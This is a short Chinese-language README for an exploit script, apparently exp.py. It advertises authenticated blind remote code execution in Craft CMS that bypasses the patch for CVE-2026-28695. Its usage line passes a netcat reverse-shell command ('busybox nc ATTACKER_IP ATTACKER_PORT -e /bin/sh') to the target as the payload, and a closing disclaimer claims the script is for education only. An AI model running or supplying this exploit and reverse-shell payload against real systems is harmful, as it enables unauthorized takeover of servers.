Craft CMS 中的认证后盲远程代码执行。绕过了 CVE-2026-28695 修复(提交 e31e508)中添加的 create() - BaseObject 限制。
python3 exp.py -t http://target.htb -u user -p 'password' -c 'busybox nc ATTACKER_IP ATTACKER_PORT -e /bin/sh'
本脚本仅供教育目的使用。作者不对因使用此漏洞利用程序而造成的任何误用或损害负责。在测试或利用漏洞之前,请务必确保您已获得授权!